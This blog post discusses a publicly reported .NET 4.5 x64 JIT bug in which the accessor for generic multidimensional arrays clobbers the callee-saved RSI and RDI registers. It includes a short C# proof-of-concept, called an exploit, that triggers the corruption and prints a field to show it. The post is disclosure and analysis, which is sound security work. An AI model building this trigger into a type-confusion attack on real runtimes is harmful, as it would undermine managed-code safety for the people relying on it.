I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:
using System;
using System.Runtime.CompilerServices;

// A 3-byte struct: with T = Foo the JIT has to generate a specialised accessor for T[,].
struct Foo { byte b1, b2, b3; }

class U1 { }
class U2 { }

// Reference fields that stay live across the array access, so the JIT keeps them
// in callee-saved registers or stack slots around it.
struct StackFields { internal object f1; internal U1 f2; internal U2 f3; }

class Program
{
    long field1;
    long field2;

    static void Main()
    {
        new Program().Get(new Foo[1, 1]);
    }

    [MethodImpl(MethodImplOptions.NoInlining)]
    object Get<T>(T[,] arr)
    {
        StackFields fields = new StackFields();
        fields.f1 = new U1();
        fields.f2 = new U1();
        fields.f3 = new U2();
        arr.ToString();
        object v = arr[0, 0];          // generic multidimensional array accessor: this is what clobbers RSI/RDI
        field2 = field1;
        Console.WriteLine(fields.f3);  // a correct JIT prints "U2"; a clobbered register shows up here
        return v;
    }
}
This requires .NET 4.5 x64 (and must be built/run in release mode).
The bug is that the JIT-generated accessor for the generic multidimensional array (the arr[0, 0] read above) clobbers the RSI and RDI registers, which are callee-saved in the x64 calling convention, so the caller's values held in them are corrupted.
Powered by: newtelligence dasBlog 2.3.12105.0
© Copyright 2021, Jeroen Frijters